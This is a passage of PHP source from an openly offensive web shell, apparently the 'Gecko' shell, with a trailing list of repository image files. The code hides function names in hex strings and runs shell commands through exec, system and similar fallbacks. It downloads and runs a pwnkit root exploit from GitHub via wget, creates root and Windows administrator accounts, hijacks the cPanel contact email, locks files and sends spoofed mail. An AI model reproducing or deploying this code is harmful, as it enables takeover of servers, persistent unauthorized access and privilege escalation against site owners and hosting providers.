$put_htt = $fungsi[28]($DOC_ROOT . "/.htaccess", $htaccess); 1140 | if ($put_htt) { 1141 | success(); 1142 | } else { 1143 | failed(); 1144 | } 1145 | } else { 1146 | failed(); 1147 | } 1148 | } 1149 | 1150 | 1151 | if (isset($_POST['save-editor'])) { 1152 | $save = $fungsi[28]($fungsi[0]() . "/" . unx($_GET['f']), $_POST['code-editor']); 1153 | if ($save) { 1154 | success(); 1155 | } else { 1156 | failed(); 1157 | } 1158 | } 1159 | 1160 | if (isset($_GET['adminer'])) { 1161 | $URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70"; 1162 | if (!$fungsi[3]('adminer.php')) { 1163 | $fungsi[28]("adminer.php", $fungsi[11]($URL)); 1164 | echo ''; 1165 | } 1166 | } 1167 | 1168 | 1169 | if ($_GET['terminal'] == "root") { 1170 | if (!$fungsi[3]('pwnkit') && $fungsi[4]($fungsi[0]())) { 1171 | $fungsi[28]("pwnkit", $fungsi[11]("https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit")); 1172 | cmd('chmod +x pwnkit'); 1173 | echo cmd('./pwnkit "id" > .mad-root'); 1174 | echo ''; 1175 | } 1176 | } 1177 | 1178 | if (isset($_POST['submit-action'])) { 1179 | $items = $_POST['check']; 1180 | if ($_POST['gecko-select'] == "delete") { 1181 | foreach ($items as $it) { 1182 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1183 | $fd = $repl . "/" . $it; 1184 | if (is_dir($fd) || is_file($fd)) { 1185 | $rmdir = unlinkDir($fd); 1186 | $rmfile = $fungsi[24]($fd); 1187 | if ($rmdir || $rmfile) { 1188 | success(); 1189 | } else if ($rmdir && $rmfile) { 1190 | success(); 1191 | } else { 1192 | failed(); 1193 | } 1194 | } 1195 | } 1196 | } else if ($_POST['gecko-select'] == 'unzip') { 1197 | foreach ($items as $it) { 1198 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1199 | $fd = $repl . "/" . $it; 1200 | if (ExtractArchive($fd, $repl . '/') == true) { 1201 | success(); 1202 | } else { 1203 | failed(); 1204 | } 1205 | } 1206 | } else if ($_POST['gecko-select'] == 'zip') { 1207 | foreach ($items as $it) { 1208 | $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path 1209 | $fd = $repl . "/" . $it; 1210 | if ($fungsi[3]($fd)) { 1211 | compressToZip($fd, pathinfo($fd, PATHINFO_FILENAME) . ".zip"); 1212 | } 1213 | } 1214 | } 1215 | } 1216 | 1217 | if (isset($_POST['submit'])) { 1218 | if ($_POST['resetcp'] == true) { 1219 | $emailCp = $_POST['resetcp']; 1220 | $path0cp = dirname($_SERVER['DOCUMENT_ROOT']); 1221 | $pathcp = $path0cp . "/.cpanel/contactinfo"; 1222 | $contactinfo = ' 1223 | "email" : "' . $emailCp . '" 1224 | '; 1225 | if ($fungsi[3]($pathcp)) { 1226 | $fungsi[28]($pathcp, $contactinfo); 1227 | echo ''; 1228 | } else { 1229 | failed(); 1230 | } 1231 | } 1232 | if ($_POST['create_folder'] == true) { 1233 | $NamaFolder = $fungsi[12]($_POST['create_folder']); 1234 | if ($NamaFolder) { 1235 | success(); 1236 | } else { 1237 | failed(); 1238 | } 1239 | } else if ($_POST['create_file'] == true) { 1240 | $namaFile = $fungsi[13]($_POST['create_file']); 1241 | if ($namaFile) { 1242 | success(); 1243 | } else { 1244 | failed(); 1245 | } 1246 | } else if ($_POST['renameFile'] == true) { 1247 | $renameFile = $fungsi[15](unx($_GET['re']), $_POST['renameFile']); 1248 | if ($renameFile) { 1249 | success(); 1250 | } else { 1251 | failed(); 1252 | } 1253 | } else if ($_POST['chFile']) { 1254 | $chFiles = $fungsi[30](unx($_GET['ch']), $_POST['chFile']); 1255 | if ($chFiles) { 1256 | success(); 1257 | } else { 1258 | failed(); 1259 | } 1260 | } else if (isset($_POST['add-username']) && isset($_POST['add-password'])) { 1261 | if (!$fungsi[3]('pwnkit')) { 1262 | cmd('wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit'); 1263 | cmd('chmod +x pwnkit'); 1264 | cmd('./pwnkit "id" > .mad-root'); 1265 | echo ''; 1266 | } else if ($fungsi[3]('.mad-root')) { 1267 | $response = $fungsi[11]('.mad-root'); 1268 | $r_text = explode(" ", $response); 1269 | if ($r_text[0] == "uid=0(root)") { 1270 | $username = $_POST['add-username']; 1271 | $password = $_POST['add-password']; 1272 | cmd('./pwnkit "useradd ' . $username . ' ; echo -e "' . $password . '\n' . $password . '" | passwd ' . $username . '"'); 1273 | } else { 1274 | echo ''; 1275 | } 1276 | } 1277 | } else if ($_POST['lockfile'] == true) { 1278 | $flesName = $_POST['lockfile']; 1279 | $TmpNames = $fungsi[31](); 1280 | if (file_exists($TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . remove_dot($flesName) . '-text')) { 1281 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file')); 1282 | cmd('rm -rf ' . $TmpNames . '/.sessions/.' . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-handler')); 1283 | } 1284 | mkdir($TmpNames . "/.sessions"); 1285 | cmd("cp $flesName " . $TmpNames . "/.sessions/." . $fungsi[33]($fungsi[0]() . remove_dot($flesName) . '-text-file')); 1286 | cmd("chmod 444 " . $flesName); 1287 | $handler = ' 1288 | /dev/null 2>/dev/null &'); 1313 | success(); 1314 | } else { 1315 | failed(); 1316 | } 1317 | } else if ($_POST['add-rdp'] == True) { 1318 | $userRDP = $_POST['add-rdp']; 1319 | $passRDP = $_POST['add-rdp-pass']; 1320 | if (stristr(PHP_OS, "WIN")) { 1321 | $procRDP = cmd("net user " . $userRDP . " " . $passRDP . " /add"); 1322 | if ($procRDP) { 1323 | cmd("net localgroup administrators " . $userRDP . " /add"); 1324 | success(); 1325 | } else { 1326 | failed(); 1327 | } 1328 | } else { 1329 | failed(); 1330 | } 1331 | } else if ($_POST['mail-from-smtp'] == True) { 1332 | $emailFrom = $_POST['mail-from-smtp']; 1333 | $emailTo = $_POST['mail-to-smtp']; 1334 | $emailSubject = $_POST['mailto-subject']; 1335 | $messageMail = $_POST['message-smtp']; 1336 | $headersMail = 'From: ' . $emailFrom . '' . "\r\n" . 1337 | 'Reply-To: ' . $emailFrom . '' . "\r\n" . 1338 | 'X-Mailer: PHP/' . phpversion(); 1339 | $procMailSmTp = mail($emailTo, $emailSubject, $messageMail, $headersMail); 1340 | if ($procMailSmTp) { 1341 | success(); 1342 | } else { 1343 | failed(); 1344 | } 1345 | } 1346 | } 1347 | 1348 | if ($_GET['response'] == "success") { 1349 | echo ""; 1356 | } else if ($_GET['response'] == "failed") { 1357 | echo ""; 1365 | } 1366 | 1367 | 1368 | function success() 1369 | { 1370 | echo ''; 1371 | } 1372 | function failed() 1373 | { 1374 | echo ''; 1375 | } 1376 | 1377 | function formatSize($bytes) 1378 | { 1379 | $types = array('B', 'KB', 'MB', 'GB', 'TB'); 1380 | for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); 1381 | return (round($bytes, 2) . " " . $types[$i]); 1382 | } 1383 | 1384 | 1385 | function hx($n) 1386 | { 1387 | $y = ''; 1388 | for ($i = 0; $i < strlen($n); $i++) { 1389 | $y .= dechex(ord($n[$i])); 1390 | } 1391 | return $y; 1392 | } 1393 | function unx($y) 1394 | { 1395 | $n = ''; 1396 | for ($i = 0; $i < strlen($y) - 1; $i += 2) { 1397 | $n .= chr(hexdec($y[$i] . $y[$i + 1])); 1398 | } 1399 | return $n; 1400 | } 1401 | 1402 | function suggest_exploit() 1403 | { 1404 | $uname = $GLOBALS['fungsi'][8](); 1405 | $xplod = explode(" ", $uname); 1406 | $xpld = explode("-", $xplod[2]); 1407 | $pl = explode(".", $xpld[0]); 1408 | return $pl[0] . "." . $pl[1] . "." . $pl[2]; 1409 | } 1410 | function s() 1411 | { 1412 | $d0mains = @$GLOBALS['fungsi'][7]("/etc/named.conf", false); 1413 | if (!$d0mains) { 1414 | $dom = "Cant Read [ /etc/named.conf ]"; 1415 | $GLOBALS["need_to_update_header"] = "true"; 1416 | } else { 1417 | $count = 0; 1418 | foreach ($d0mains as $d0main) { 1419 | if (@strstr($d0main, "zone")) { 1420 | preg_match_all('#zone "(.*)"#', $d0main, $domains); 1421 | flush(); 1422 | if (strlen(trim($domains[1][0])) > 2) { 1423 | flush(); 1424 | $count++; 1425 | } 1426 | } 1427 | } 1428 | $dom = "$count Domain"; 1429 | } 1430 | return $dom; 1431 | } 1432 | 1433 | function cmd($in, $re = false) 1434 | { 1435 | $out = ''; 1436 | try { 1437 | if ($re) $in = $in . " 2>&1"; 1438 | if (function_exists("\x65\x78\x65\x63")) { 1439 | @$GLOBALS['fungsi'][16]($in, $out); 1440 | $out = @join("\n", $out); 1441 | } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { 1442 | ob_start(); 1443 | @$GLOBALS['fungsi'][17]($in); 1444 | $out = ob_get_clean(); 1445 | } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { 1446 | ob_start(); 1447 | @$GLOBALS['fungsi'][18]($in); 1448 | $out = ob_get_clean(); 1449 | } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { 1450 | $out = $GLOBALS['fungsi'][19]($in); 1451 | } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { 1452 | if (is_resource($f = @$GLOBALS['fungsi'][20]($in, "r"))) { 1453 | $out = ""; 1454 | while (!@feof($f)) 1455 | $out .= fread($f, 1024); 1456 | $GLOBALS['fungsi'][21]($f); 1457 | } 1458 | } elseif (function_exists("\x70\x72\x6f\x63\x5f\x6f\x70\x65\x6e")) { 1459 | $pipes = array(); 1460 | $process = @$GLOBALS['fungsi'][23]($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); 1461 | $out = @$GLOBALS['fungsi'][22]($pipes[1]); 1462 | } 1463 | } catch (Exception $e) { 1464 | } 1465 | return $out; 1466 | } 1467 | 1468 | 1469 | function winpwd() 1470 | { 1471 | return str_replace("\\", "/", $GLOBALS['fungsi'][0]()); 1472 | } 1473 | 1474 | function compressToZip($sourceFile, $zipFilename) 1475 | { 1476 | $zip = new ZipArchive(); 1477 | 1478 | if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { 1479 | $zip->addFile($sourceFile, basename($sourceFile)); 1480 | $zip->close(); 1481 | success(); 1482 | } else { 1483 | failed(); 1484 | } 1485 | } 1486 | 1487 | function remove_slash($val) 1488 | { 1489 | $tex = str_replace("/", "", $val); 1490 | $tex1 = str_replace(":", "", $tex); 1491 | $tex2 = str_replace("_", "", $tex1); 1492 | $tex3 = str_replace(" ", "", $tex2); 1493 | $tex4 = str_replace(".", "", $tex3); 1494 | return $tex4; 1495 | } 1496 | 1497 | function unlinkDir($dir) 1498 | { 1499 | $dirs = array($dir); 1500 | $files = array(); 1501 | for ($i = 0;; $i++) { 1502 | if (isset($dirs[$i])) 1503 | $dir = $dirs[$i]; 1504 | else 1505 | break; 1506 | 1507 | if ($openDir = opendir($dir)) { 1508 | while ($readDir = @readdir($openDir)) { 1509 | if ($readDir != "." && $readDir != "..") { 1510 | 1511 | if ($GLOBALS['fungsi'][2]($dir . "/" . $readDir)) { 1512 | $dirs[] = $dir . "/" . $readDir; 1513 | } else { 1514 | 1515 | $files[] = $dir . "/" . $readDir; 1516 | } 1517 | } 1518 | } 1519 | } 1520 | } 1521 | 1522 | 1523 | 1524 | foreach ($files as $file) { 1525 | $GLOBALS['fungsi'][24]($file); 1526 | } 1527 | $dirs = array_reverse($dirs); 1528 | foreach ($dirs as $dir) { 1529 | $GLOBALS['fungsi'][25]($dir); 1530 | } 1531 | } 1532 | 1533 | function remove_dot($file) 1534 | { 1535 | $FILES = $file; 1536 | $pch = explode(".", $FILES); 1537 | return $pch[0]; 1538 | } 1539 | 1540 | 1541 | function windowsDriver() 1542 | { 1543 | $winArr = [ 1544 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z' 1545 | ]; 1546 | foreach ($winArr as $winNum => $winVal) { 1547 | if (is_dir($winVal . ":/")) { 1548 | echo "[ " . $winVal . " ]  "; 1549 | } 1550 | } 1551 | } 1552 | 1553 | function namaPanjang($value) 1554 | { 1555 | $namaNya = $value; 1556 | $extensi = pathinfo($value, PATHINFO_EXTENSION); 1557 | if (strlen($namaNya) > 30) { 1558 | return substr($namaNya, 0, 30) . "..."; 1559 | } else { 1560 | return $value; 1561 | } 1562 | } 1563 | 1564 | function extractArchive($archiveFilename, $extractPath) 1565 | { 1566 | $zip = new ZipArchive(); 1567 | 1568 | if ($zip->open($archiveFilename) === TRUE) { 1569 | $zip->extractTo($extractPath); 1570 | $zip->close(); 1571 | return true; 1572 | } else { 1573 | return false; 1574 | } 1575 | } 1576 | 1577 | function perms($file) 1578 | { 1579 | $perms = $GLOBALS['fungsi'][6]($file); 1580 | if (($perms & 0xC000) == 0xC000) { 1581 | // Socket 1582 | $info = 's'; 1583 | } elseif (($perms & 0xA000) == 0xA000) { 1584 | // Symbolic Link 1585 | $info = 'l'; 1586 | } elseif (($perms & 0x8000) == 0x8000) { 1587 | // Regular 1588 | $info = '-'; 1589 | } elseif (($perms & 0x6000) == 0x6000) { 1590 | // Block special 1591 | $info = 'b'; 1592 | } elseif (($perms & 0x4000) == 0x4000) { 1593 | // Directory 1594 | $info = 'd'; 1595 | } elseif (($perms & 0x2000) == 0x2000) { 1596 | // Character special 1597 | $info = 'c'; 1598 | } elseif (($perms & 0x1000) == 0x1000) { 1599 | // FIFO pipe 1600 | $info = 'p'; 1601 | } else { 1602 | // Unknown 1603 | $info = 'u'; 1604 | } 1605 | // Owner 1606 | $info .= (($perms & 0x0100) ? 'r' : '-'); 1607 | $info .= (($perms & 0x0080) ? 'w' : '-'); 1608 | $info .= (($perms & 0x0040) ? 1609 | (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); 1610 | // Group 1611 | $info .= (($perms & 0x0020) ? 'r' : '-'); 1612 | $info .= (($perms & 0x0010) ? 'w' : '-'); 1613 | $info .= (($perms & 0x0008) ? 1614 | (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); 1615 | 1616 | // World 1617 | $info .= (($perms & 0x0004) ? 'r' : '-'); 1618 | $info .= (($perms & 0x0002) ? 'w' : '-'); 1619 | $info .= (($perms & 0x0001) ? 1620 | (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); 1621 | return $info; 1622 | } 1623 | ?> 1624 | -------------------------------------------------------------------------------- /gecko1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/gecko1.png -------------------------------------------------------------------------------- /image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/image.png -------------------------------------------------------------------------------- /marriage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/marriage.png -------------------------------------------------------------------------------- /s.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/s.gif -------------------------------------------------------------------------------- /sarusai.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MadExploits/Gecko/5f2750be58315ce6f9bc8dbb97af4667fe4d322d/sarusai.gif --------------------------------------------------------------------------------